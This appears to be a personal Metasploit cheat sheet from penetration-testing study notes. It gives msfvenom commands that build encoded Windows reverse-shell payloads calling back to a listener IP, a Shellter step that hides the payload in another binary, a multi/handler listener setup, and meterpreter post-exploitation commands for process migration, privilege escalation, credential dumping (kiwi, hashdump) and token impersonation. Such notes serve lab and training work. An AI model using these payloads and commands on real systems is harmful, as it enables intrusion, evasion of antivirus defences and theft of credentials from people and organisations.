Metasploit
(-a x86)
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.173 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw -o shell.bin
shellter custom payload N stealth N DLL
sudo msfconsole -q -x "use exploit/multi/handler;\
set PAYLOAD windows/shell/reverse_tcp;\
set LHOST 192.168.119.173;\
set LPORT 80;\
run"
(set AutoRunScript post/windows/manage/migrate;\)
(-a x86)
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.173 LPORT=443 -e x86/shikata_ga_nai -i 7 -f exe -o shell.exe
basic operations
meterpreter >
ps (check all process)
migrate {process id} (move current process to same priv process for better operation)
#e.g. explorer, svchost
background (so that can start new listeners in exploit(multi/handler))
exit (!! kill the session and return to exploit(multi/handler))
upload /local/doc C:/dest/doc
download C:/dest/doc /local/doc
---------------------------------
normal shell (not meterpreter):
background
=========================
exploit(multi/handler) >
sessions -l (list sessions)
sessions -i # (go back to session #)
-k to kill
run -j (start new listener on background)
show options
show advanced
jobs (show listener)
meterpreter >
exploit commands
meterpreter >
exploit commandsgetsystem (from medium integrity)
load kiwi
creds_msv
hashdump
(may need migrate to a valid process first)
use incognito
list_tokens -u
impersonate_token {interested user} (domain\\xx = domain\xx)
getuid
drop_token
load powershell
help powershell
Last updated